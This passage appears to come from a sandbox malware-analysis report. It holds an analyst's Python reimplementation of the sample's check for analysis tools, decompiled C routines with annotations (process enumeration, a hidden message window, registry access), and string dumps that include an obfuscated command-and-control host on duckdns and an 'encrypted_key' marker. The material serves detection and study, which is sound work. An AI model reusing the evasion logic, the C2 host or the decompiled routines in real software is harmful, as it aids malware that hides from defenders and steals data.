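    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    try:   # psapi.dll first, kernel32.dll fallback, mirroring the two E00407F8E calls
        get_path = ctypes.WinDLL("psapi").GetModuleFileNameExA
    except (OSError, AttributeError):
        get_path = k32.K32GetModuleFileNameExA
    get_path.restype = ctypes.c_uint32
    get_path.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p, ctypes.c_uint32]

    snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    if snap in (None, INVALID_HANDLE_VALUE):       # the sample's __eax == 0xffffffff exit
        raise ctypes.WinError(ctypes.get_last_error())
    entry = entry_t(dwSize=ctypes.sizeof(entry_t))  # the 0x128 store before Process32First
    found = []
    try:
        ok = k32.Process32First(snap, ctypes.byref(entry))
        while ok:
            path, h = None, k32.OpenProcess(ACCESS_MASK_SEEN, 0, entry.th32ProcessID)
            if h:
                buf = ctypes.create_string_buffer(MAX_PATH)
                if get_path(h, None, buf, MAX_PATH):
                    path = buf.value.decode("mbcs", "replace")
                k32.CloseHandle(h)
            found.append((entry.th32ProcessID, entry.szExeFile.decode("mbcs", "replace"), path))
            ok = k32.Process32Next(snap, ctypes.byref(entry))
    finally:
        k32.CloseHandle(snap)
    return found


def flag_analysis_tools(entries, blocklist):
    """Match exe names or image basenames against a blocklist, case-insensitively."""
    wanted = {n.lower() for n in blocklist}
    hits = []
    for pid, exe, path in entries:
        candidates = [exe.lower()]
        if path:
            candidates.append(path.replace("\\", "/").rsplit("/", 1)[-1].lower())
        match = next((c for c in candidates if c in wanted), None)
        if match:
            hits.append((pid, match))
    return hits


# Constructed input (assumed, not taken from the sandbox run) so the check runs offline.
CONSTRUCTED_ENTRIES = [(4, "System", None),
                       (1234, "Procmon.exe", r"C:\Tools\Procmon.exe"),
                       (2048, "explorer.exe", r"C:\Windows\explorer.exe")]
ANALYSIS_TOOLS = {"procmon.exe", "wireshark.exe", "x32dbg.exe"}   # analyst's own list, assumed

if __name__ == "__main__":
    print("0x410 =", " | ".join(decode_access_mask(ACCESS_MASK_SEEN)))
    print("sizeof(PROCESSENTRY32), 32-bit =", hex(processentry32_size(4)))
    entries = walk_processes() if sys.platform == "win32" else CONSTRUCTED_ENTRIES
    print("flagged:", flag_analysis_tools(entries, ANALYSIS_TOOLS))
```

On Windows the script enumerates every process whose image path can be read with those two rights and flags names on the assumed blocklist; elsewhere it only checks the constants and the struct size and runs the matcher over the constructed entries. From the detection side, a fresh user-writable binary that calls OpenProcess with exactly 0x410 against every PID and then reads each image path is a reasonable hunting observable for this family's sandbox check.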

                                                          C-Code - Quality: 49%
                                                          			E0040FE8C(signed int __eax, void* __ecx, void* __edx) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v56;
                                                          				char _v560;
                                                          				char _v1108;
                                                          				void* _v1364;
                                                          				char _v1368;
                                                          				signed int _v1396;
                                                          				char _v1404;
                                                          				char _v1432;
                                                          				char _v1436;
                                                          				char _v1444;
                                                          				signed short _v1448;
                                                          				signed short _v1450;
                                                          				signed short _v1452;
                                                          				signed short _v1454;
                                                          				signed short _v1458;
                                                          				signed short _v1460;
                                                          				char _v1464;
                                                          				char* _v1468;
                                                          				char _v1476;
                                                          				intOrPtr _v1480;
                                                          				char* _v1488;
                                                          				char* _v1496;
                                                          				char _v1500;
                                                          				intOrPtr _v1504;
                                                          				void* _v1508;
                                                          				signed int _v1512;
                                                          				signed int _v1516;
                                                          				signed int _v1520;
                                                          				signed int _v1524;
                                                          				signed int _v1528;
                                                          				signed int _v1532;
                                                          				signed int _v1536;
                                                          				signed int _v1540;
                                                          				signed int _v1544;
                                                          				char* _v1548;
                                                          				intOrPtr _v1552;
                                                          				char _v1556;
                                                          				char* _t79;
                                                          				void* _t82;
                                                          				intOrPtr* _t84;
                                                          				signed int _t85;
                                                          				signed int _t87;
                                                          				void* _t93;
                                                          				signed int _t94;
                                                          				signed int _t102;
                                                          				void* _t111;
                                                          				void* _t112;
                                                          				char* _t116;
                                                          				void* _t117;
                                                          				char* _t119;
                                                          				intOrPtr* _t121;
                                                          				char* _t123;
                                                          				char* _t124;
                                                          				signed int _t127;
                                                          				intOrPtr* _t128;
                                                          				void* _t129;
                                                          
                                                          				_t118 = __edx;
                                                          				_t117 = __ecx;
                                                          				_v1496 = 0;
                                                          				_v1500 = 2;
                                                          				L0041F664();
                                                          				_push(__edx);
                                                          				_push(__edx);
                                                          				if(__eax == 0xffffffff) {
                                                          					L3:
                                                          					_v1496 = 0;
                                                          					return E00405D7D(_t118, _v4, 0xbf, 0);
                                                          				}
                                                          				_t115 = __eax;
                                                          				_t79 =  &_v1364;
                                                          				_v1364 = 0x128;
                                                          				_v1508 = __eax;
                                                          				_v1504 = _t79;
                                                          				L0041F52C();
                                                          				_push(_t126);
                                                          				if(_t79 != 0) {
                                                          					E0041236C( &_v1432,  &_v1432, 0x8000);
                                                          					_t82 = E004081AA("Ed5FWSQid_4idLCldjfD");
                                                          					_t84 = E00407F8E(_t118, E00407F7A(_t118, "psapi.dll"), _t82);
                                                          					_t121 = _t84;
                                                          					if(_t84 == 0) {
                                                          						_t112 = E004081AA("Ed5FWSQid_4idLCldjfD");
                                                          						_t121 = E00407F8E(_t118, E00407F7A(_t118, "kernel32.dll"), _t112);
                                                          					}
                                                          					_t127 =  &_v560;
                                                          					do {
                                                          						_t85 = _v1364;
                                                          						_v1512 = 0;
                                                          						_v1516 = 0x410; // 0x410 == PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
                                                          						_v1508 = _t85;
                                                          						L0041F53C();
                                                          						_t129 = _t128 - 0xc;
                                                          						_t123 = _t85;
                                                          						if(_t85 == 0 || _t121 == 0) {
                                                          							L10:
                                                          							E00412548(_t127, 0x424374, 0x204);
                                                          							goto L11;
                                                          						} else {
                                                          							_v1516 = 0x204;
                                                          							_v1520 = _t127;
                                                          							_v1524 = 0;
                                                          							_v1528 = _t85;
                                                          							_t111 =  *_t121();
                                                          							_t129 = _t129 - 0x10;
                                                          							if(_t111 != 0) {
                                                          								L11:
                                                          								_t87 =  &_v1452;
                                                          								_t119 =  &_v1460;
                                                          								_v1528 = _t123;
                                                          								_v1512 = _t87;
                                                          								_v1516 = _t87;
                                                          								_v1520 = _t87;
                                                          								_v1524 = _t119;
                                                          								_v1468 = _t119;
                                                          								L0041F5A4();
                                                          								_t128 = _t129 - 0x14;
                                                          								if(_t87 == 0) {
                                                          									L23:
                                                          									E00412548( &_v1436, 0x424374, 0x20);
                                                          									goto L14;
                                                          								}
                                                          								_t119 = _v1488;
                                                          								if(_v1480 == 0) {
                                                          									goto L23;
                                                          								}
                                                          								_t102 =  &_v1452;
                                                          								_v1548 = _t119;
                                                          								_v1544 = _t102;
                                                          								L0041F644();
                                                          								_push(_t102);
                                                          								_push(_t102);
                                                          								_v1548 = "%.2d/%.2d/%d %.2d:%.2d:%.2d";
                                                          								_v1552 = 0x20;
                                                          								_v1524 = _v1448 & 0x0000ffff;
                                                          								_v1528 = _v1450 & 0x0000ffff;
                                                          								_v1532 = _v1452 & 0x0000ffff;
                                                          								_v1536 = _v1460 & 0x0000ffff;
                                                          								_v1540 = _v1458 & 0x0000ffff;
                                                          								_v1544 = _v1454 & 0x0000ffff;
                                                          								_v1556 =  &_v1444;
                                                          								E004127A8();
                                                          								goto L14;
                                                          							}
                                                          							goto L10;
                                                          						}
                                                          						L14:
                                                          						if(_t123 != 0) {
                                                          							_v1548 = _t123;
                                                          							L0041F694();
                                                          							_push(_t123);
                                                          						}
                                                          						_t124 =  &_v1108;
                                                          						_v1528 = _t127;
                                                          						_v1540 = 0x424376;
                                                          						_v1544 = 0x204;
                                                          						_v1524 =  &_v1436;
                                                          						_v1548 = _t124;
                                                          						_v1532 = _v1396;
                                                          						_v1536 =  &_v1368;
                                                          						_t93 = E004127A8();
                                                          						if(_t93 > 0) {
                                                          							E00412458( &_v1464, _t119,  &_v1464, _t124, _t93);
                                                          						}
                                                          						_t94 =  &_v1404;
                                                          						_v1548 = _t115;
                                                          						_v1544 = _t94;
                                                          						L0041F524();
                                                          						_push(_t117);
                                                          						_push(_t117);
                                                          					} while (_t94 != 0);
                                                          					_v1556 = _t115;
                                                          					L0041F694();
                                                          					_push(_t119);
                                                          					_t116 =  &_v1476;
                                                          					if(_v1468 == 0) {
                                                          						_v1548 = 0;
                                                          						_v1552 = 0;
                                                          						_v1556 = 0xbf;
                                                          					} else {
                                                          						 *_t128 = _t116;
                                                          						_v1548 = E00412540();
                                                          						_v1556 = 0xbe;
                                                          						_v1552 = _v1476;
                                                          					}
                                                          					 *_t128 = _v56;
                                                          					E00405D7D(_t119);
                                                          					 *_t128 = _t116;
                                                          					return E004123B1();
                                                          				}
                                                          				_v1516 = __eax;
                                                          				L0041F694();
                                                          				goto L3;
                                                          			}

                                                          (per-line address column of the decompiled view for the routine above, spanning 0x0040fe8c .. 0x0041017e; collapsed here)


                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $%.2d/%.2d/%d %.2d:%.2d:%.2d$Ed5FWSQid_4idLCldjfD$kernel32.dll$psapi.dll
                                                          • API String ID: 0-116260847
                                                          • Opcode ID: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                                                          • Instruction ID: 6fadafcb3b73e839ba5121377a1d1d4624def229cb7cc3727062cbee2f3d546e
                                                          • Opcode Fuzzy Hash: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                                                          • Instruction Fuzzy Hash: BB81C3B0408741AED720AF25C54566FBBE4AF85748F018D2EF8D887351E7BDC989CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "%s"$-m "%s"$M5QV9C5I$MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$rb+
                                                          • API String ID: 0-3789651114
                                                          • Opcode ID: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                                                          • Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
                                                          • Opcode Fuzzy Hash: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                                                          • Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $PATH$Password$Unknown$WINDIR$podzeye.duckdns.org:6688;
                                                          • API String ID: 0-1553153373
                                                          • Opcode ID: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                                                          • Instruction ID: 88353113fceb9506f3b36d61bfde8eef9921c9a466ae1bfd82caa565229af05a
                                                          • Opcode Fuzzy Hash: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                                                          • Instruction Fuzzy Hash: A2619CB49087849BD720EF65C18469EFBE0BF89348F408D2EE8D887351E7789548CF5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E00409E61(void* __edx) {
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v40;
                                                          				intOrPtr _v52;
                                                          				char _v60;
                                                          				void _v108;
                                                          				intOrPtr _v116;
                                                          				intOrPtr _v120;
                                                          				intOrPtr _v124;
                                                          				intOrPtr _v128;
                                                          				intOrPtr _v132;
                                                          				intOrPtr _v136;
                                                          				char _v140;
                                                          				intOrPtr _v144;
                                                          				intOrPtr _v148;
                                                          				intOrPtr _v152;
                                                          				char _v156;
                                                          				intOrPtr _v196;
                                                          				intOrPtr _v200;
                                                          				intOrPtr _v204;
                                                          				void* _t29;
                                                          				intOrPtr _t31;
                                                          				void* _t32;
                                                          				void* _t35;
                                                          				char* _t36;
                                                          				void* _t39;
                                                          				char _t45;
                                                          				void* _t46;
                                                          				intOrPtr* _t48;
                                                          
                                                          				_t39 = __edx;
                                                          				memcpy( &_v108, L"ssdaClass", 5 << 2); // 20 bytes: the wide class name plus its terminator
                                                          				_t48 = _t46 - 0x90 + 0xc;
                                                          				_t29 = E004081AA("rdn465d0rCgXRsQ5ad24Yd6");
                                                          				_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t29);
                                                          				 *0x42b9e4 = _t31;
                                                          				if(_t31 != 0) {
                                                          					_t32 = E004081AA("Ed5rCgXRsQ5aC5C");
                                                          					_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t32);
                                                          					 *0x42b9e0 = _t31;
                                                          					if(_t31 == 0) {
                                                          						goto L1;
                                                          					} else {
                                                          						_t45 =  &_v60;
                                                          						_t35 =  &_v108;
                                                          						_t31 = E004129E4(_t45, 0, 0x30);
                                                          						_v156 = _t45;
                                                          						_v60 = 0x30; // 0x30 == sizeof(WNDCLASSEXW) on x86 (cbSize at offset 0)
                                                          						_v52 = E00409CF9; // offset 8 of the same structure is lpfnWndProc: the window procedure
                                                          						_v40 = 0;
                                                          						_v20 = _t35;
                                                          						L0041F854();
                                                          						_push(0);
                                                          						if(_t31 != 0) {
                                                          							_v156 = _t35;
                                                          							_v116 = 0;
                                                          							_v120 = 0;
                                                          							_v124 = 0;
                                                          							_v128 = 0xfffffffd; // (HWND)-3 == HWND_MESSAGE, i.e. a message-only window as parent
                                                          							_v132 = 0;
                                                          							_v136 = 0;
                                                          							_v140 = 0;
                                                          							_v144 = 0;
                                                          							_v148 = 0;
                                                          							_v152 = 0;
                                                          							 *_t48 = 0;
                                                          							L0041F8DC();
                                                          							_t48 = _t48 - 0x30;
                                                          							_t36 =  &_v140;
                                                          							if(_t31 == 0) {
                                                          								goto L4;
                                                          							} else {
                                                          								while(1) {
                                                          									_v196 = 0;
                                                          									_v200 = 0;
                                                          									_v204 = 0;
                                                          									 *_t48 = _t36;
                                                          									L0041F884();
                                                          									_t48 = _t48 - 0x10;
                                                          									if(_t31 <= 0) { // exit on 0 or -1, the classic message-loop idiom
                                                          										break;
                                                          									}
                                                          									 *_t48 = _t36;
                                                          									L0041F814();
                                                          									_push(_t31);
                                                          									 *_t48 = _t36;
                                                          									L0041F8CC();
                                                          									_push(_t39);
                                                          								}
                                                          								 *0x422830 = 0xa;
                                                          							}
                                                          						} else {
                                                          							L4:
                                                          							 *0x422830 = 7;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					L1:
                                                          					 *0x422830 = 6;
                                                          				}
                                                          				return _t31;
                                                          			}


                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$0$Ed5rCgXRsQ5aC5C$rdn465d0rCgXRsQ5ad24Yd6$ssdaClass$user32.dll
                                                          • API String ID: 0-2341246112
                                                          • Opcode ID: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                                                          • Instruction ID: dc59c3b724a470855dcc4065ae2b59d1d9b3c777af613543eb6a0d926dcb9681
                                                          • Opcode Fuzzy Hash: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                                                          • Instruction Fuzzy Hash: 863108B05183019AE310BF25D55531FBAE0BF84348F41892EF4C4AB292D7BD8949CB9B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MT_qUDrj\FWk4iiC\%6\$MT_qUDrj\FWk4iiC\%6\%6\FC4R$PQ00dR5zd064WR$XR65Cii a40dY5W0Z$x64
                                                          • API String ID: 0-4110341741
                                                          • Opcode ID: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                                                          • Instruction ID: 72ec6481281fc5666a7dbf46cbeff2a2701b551c42623141a7dd164dfcf0ae83
                                                          • Opcode Fuzzy Hash: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                                                          • Instruction Fuzzy Hash: E221E0B0508301AED300AF26D54925EFBF4EF88308F418D2EE8D897241D7BD9685CB8A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$0x%02hhX$0x05$0x0D$encrypted_key
                                                          • API String ID: 0-939079894
                                                          • Opcode ID: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                                                          • Instruction ID: 786053efb03fb7134250340436023ef553204ed8f41ee6c066ba5e47f52fe47d
                                                          • Opcode Fuzzy Hash: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                                                          • Instruction Fuzzy Hash: FEC1EAB1A053198FDB50DF25C844B9EBBF0BF45308F0588AEE489E7681D7789A84CF46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $($($6$BM
                                                          • API String ID: 0-2637400849
                                                          • Opcode ID: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                                                          • Instruction ID: c42d9fa6f562a18c3eedbb1c72d559f421865ac330c7369b2ec7bacda9b62638
                                                          • Opcode Fuzzy Hash: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                                                          • Instruction Fuzzy Hash: 4781BDB05093409FD310EF6AD68475BBBE4AF88744F40892EF58887351E7B9D8888B5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $../nettle-3.5.1/ctr16.c$c$length - i < CTR_BUFFER_LIMIT$length < 16
                                                          • API String ID: 0-535899598
                                                          • Opcode ID: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                                                          • Instruction ID: 595662ab794f8c563696035dacf2dbdab12226766188b8df76e1304a900497cc
                                                          • Opcode Fuzzy Hash: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                                                          • Instruction Fuzzy Hash: 1E71DDB5A083199FDB00EF69D48859EBBE0EF88354F01C92EF89997351C3389854CF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %6\.sQ0sid\CYYWQR56.fli$<RCld>$<s0W5WYWi>$<sC66gW0S>$APPDATA
                                                          • API String ID: 0-1218082621
                                                          • Opcode ID: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                                                          • Instruction ID: 6048a10f2db6f6121dbf09b1e91f7eeb88fe885a8aaa66a3f769cde923567c5e
                                                          • Opcode Fuzzy Hash: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                                                          • Instruction Fuzzy Hash: EC41D8B0408311DAD310AF25D58526EBAF4BF84758F50CA2FE4D897381D77C8585DB5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $DiiWYC5dDRSXR454Ci4kdM4S$PIdYwqWwdRFdlVd06I4s$_0ddM4S$advapi32.dll
                                                          • API String ID: 0-1236196231
                                                          • Opcode ID: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                                                          • Instruction ID: 116aa698c271bca6352efc5b2b04a0db36bd32a1f1fa5c071599b3e3fb9e0c6d
                                                          • Opcode Fuzzy Hash: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                                                          • Instruction Fuzzy Hash: FC31D7B0509351ABD740AF65D59831FBAE0AF84348F41982EF5C49B381D7BDC5848B87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 61%
                                                          			E00410FC4(void* __ecx, signed int _a4, signed int _a8, signed int _a12, void* _a16, intOrPtr _a32) {
                                                          				signed int _v0;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				signed int _v44;
                                                          				char _v544;
                                                          				char _v548;
                                                          				char _v556;
                                                          				char _v568;
                                                          				char _v572;
                                                          				signed int _v576;
                                                          				void* _v580;
                                                          				signed int _v584;
                                                          				signed int _v588;
                                                          				signed int _v592;
                                                          				signed int _v596;
                                                          				signed int _v600;
                                                          				signed int _v604;
                                                          				signed int _v608;
                                                          				signed int _v612;
                                                          				signed int _v616;
                                                          				signed int _v620;
                                                          				signed int _v624;
                                                          				signed int _v628;
                                                          				char* _v632;
                                                          				char _v636;
                                                          				char _v640;
                                                          				intOrPtr _v644;
                                                          				signed int _v648;
                                                          				signed int* _v652;
                                                          				signed int _v656;
                                                          				signed int _v660;
                                                          				intOrPtr _v664;
                                                          				signed int _v668;
                                                          				intOrPtr _v692;
                                                          				signed int _t122;
                                                          				signed int _t129;
                                                          				signed int _t133;
                                                          				signed int _t134;
                                                          				void* _t136;
                                                          				void* _t137;
                                                          
                                                          				_t137 = _t136 - 0x24c;
                                                          				_t134 = _a8;
                                                          				_t133 = _a12;
                                                          				_t122 = _a32 - 1;
                                                          				if(_t122 > 5) {
                                                          					L28:
                                                          					_t129 = 0;
                                                          					L29:
                                                          					return _t129;
                                                          				}
                                                          				switch( *((intOrPtr*)(_t122 * 4 +  &M0042444C))) {
                                                          					case 0:
                                                          						_v580 = 0;
                                                          						_v584 = 0xf003f;
                                                          						_v588 = 0;
                                                          						_v592 = 0;
                                                          						_v572 =  &_v548;
                                                          						_t125 =  &_v556;
                                                          						_v596 = 0;
                                                          						_v600 = _t133;
                                                          						_v604 = _t134;
                                                          						_v576 = _t125;
                                                          						L0041F454();
                                                          						_t137 = _t137 - 0x24;
                                                          						if(_t125 != 0) {
                                                          							goto L28;
                                                          						}
                                                          						_v620 = _t133;
                                                          						_v624 = _t134;
                                                          						_v628 = 1;
                                                          						goto L7;
                                                          					case 1:
                                                          						__eax =  &_v556;
                                                          						_v592 = 0x2001f;
                                                          						_v596 = 0;
                                                          						_v600 = __edi;
                                                          						_v604 = __esi;
                                                          						_v588 = __eax;
                                                          						L0041F42C();
                                                          						__esp = __esp - 0x14;
                                                          						if(__eax != 0) {
                                                          							goto L28;
                                                          						}
                                                          						__eax = _a8;
                                                          						_v616 = 0;
                                                          						_v620 = __ebp;
                                                          						_v604 = _a8;
                                                          						__eax = _a4;
                                                          						_v608 = _a4;
                                                          						__eax = _v0;
                                                          						_v612 = _v0;
                                                          						__eax = _v576;
                                                          						_v624 = __eax;
                                                          						L0041F41C();
                                                          						__esp = __esp - 0x18;
                                                          						__ebx = __eax;
                                                          						__eax = _v600;
                                                          						_v648 = __eax;
                                                          						L0041F45C();
                                                          						_push(__eax);
                                                          						if(__ebx != 0) {
                                                          							goto L28;
                                                          						}
                                                          						_v632 = __edi;
                                                          						_v636 = __esi;
                                                          						_v640 = 2;
                                                          						L7:
                                                          						_t130 =  &_v580;
                                                          						_v632 = "%c%.8x%s";
                                                          						_v636 = 0x204;
                                                          						_v640 =  &_v580;
                                                          						_t126 = E004127A8();
                                                          						goto L14;
                                                          					case 2:
                                                          						__eax = E0041086B(__ecx, __esi, __edi, __ebp);
                                                          						__bl = __al;
                                                          						if(__al == 0) {
                                                          							goto L28;
                                                          						}
                                                          						_v588 = __esi;
                                                          						__esi =  &_v544;
                                                          						_v580 = __ebp;
                                                          						_v584 = __edi;
                                                          						__eax = E004127A8( &_v544, 0x204, "%c%.8x%s%s", 3);
                                                          						if(__eax == 0) {
                                                          							goto L16;
                                                          						}
                                                          						goto L27;
                                                          					case 3:
                                                          						__eax =  &_v556;
                                                          						_v592 = 0x2001f;
                                                          						_v596 = 0;
                                                          						_v600 = __edi;
                                                          						_v604 = __esi;
                                                          						_v588 = __eax;
                                                          						L0041F42C();
                                                          						__esp = __esp - 0x14;
                                                          						if(__eax != 0) {
                                                          							goto L28;
                                                          						}
                                                          						__eax = _v576;
                                                          						_v620 = __ebp;
                                                          						_v624 = __eax;
                                                          						L0041F444();
                                                          						__ebx = __eax;
                                                          						_push(__ecx);
                                                          						_push(__ecx);
                                                          						__eax = _v584;
                                                          						_v632 = __eax;
                                                          						L0041F45C();
                                                          						_push(__eax);
                                                          						if(__ebx != 0) {
                                                          							goto L28;
                                                          						}
                                                          						__ebx =  &_v576;
                                                          						_v612 = __ebp;
                                                          						_v616 = __edi;
                                                          						_v620 = __esi;
                                                          						__eax = E004127A8( &_v576, 0x204, "%c%.8x%s\\%s", 4);
                                                          						L14:
                                                          						if(_t126 != 0) {
                                                          							_v628 = _t126;
                                                          							E00405D7D(_t132, _v32, 0xe8, _t130);
                                                          						}
                                                          						L16:
                                                          						_t129 = 1;
                                                          						goto L29;
                                                          					case 4:
                                                          						goto L28;
                                                          					case 5:
                                                          						__eax =  &_v556;
                                                          						_v592 = 0x2001f;
                                                          						_v596 = 0;
                                                          						_v600 = __edi;
                                                          						_v604 = __esi;
                                                          						_v588 = __eax;
                                                          						L0041F42C();
                                                          						__esp = __esp - 0x14;
                                                          						if(__eax != 0) {
                                                          							goto L28;
                                                          						}
                                                          						__eax =  &_v572;
                                                          						_v608 = 0;
                                                          						_v616 = 0;
                                                          						_v620 = __ebp;
                                                          						__ebx = 0;
                                                          						_v604 =  &_v572;
                                                          						__eax =  &_v568;
                                                          						_v612 =  &_v568;
                                                          						__eax = _v576;
                                                          						_v624 = __eax;
                                                          						L0041F424();
                                                          						__esp = __esp - 0x18;
                                                          						if(__eax != 0) {
                                                          							L25:
                                                          							__eax = _v600;
                                                          							_v648 = __eax;
                                                          							L0041F45C();
                                                          							_push(__eax);
                                                          							if(__bl == 0) {
                                                          								goto L29;
                                                          							}
                                                          							__eax = _v24;
                                                          							_v636 = __esi;
                                                          							__esi =  &_v592;
                                                          							_v624 = __ebp;
                                                          							_v632 = __edi;
                                                          							_v640 = 6;
                                                          							_v644 = 0x42443c;
                                                          							_v628 = _v24;
                                                          							_v648 = 0x204;
                                                          							_v652 =  &_v592;
                                                          							__eax = E004127A8();
                                                          							if(__eax == 0) {
                                                          								goto L29;
                                                          							}
                                                          							L27:
                                                          							_v592 = __eax;
                                                          							_a4 = E00405D7D(__edx, _a4, 0xe8, __esi);
                                                          							goto L29;
                                                          						}
                                                          						__eax = _v596;
                                                          						_v648 = __eax;
                                                          						L0041F714();
                                                          						_v588 = __eax;
                                                          						if(__eax == 0) {
                                                          							goto L25;
                                                          						}
                                                          						_v632 = __eax;
                                                          						__eax =  &_v592;
                                                          						__edx =  &_v596;
                                                          						_v640 = 0;
                                                          						_v644 = __ebp;
                                                          						_v636 =  &_v592;
                                                          						__eax = _v600;
                                                          						_v628 = __edx;
                                                          						_v648 = __eax;
                                                          						L0041F424();
                                                          						__esp = __esp - 0x18;
                                                          						if(__eax == 0) {
                                                          							__eax = _v620;
                                                          							_v664 = 0;
                                                          							_v652 = _v620;
                                                          							__eax = _v612;
                                                          							_v656 = _v612;
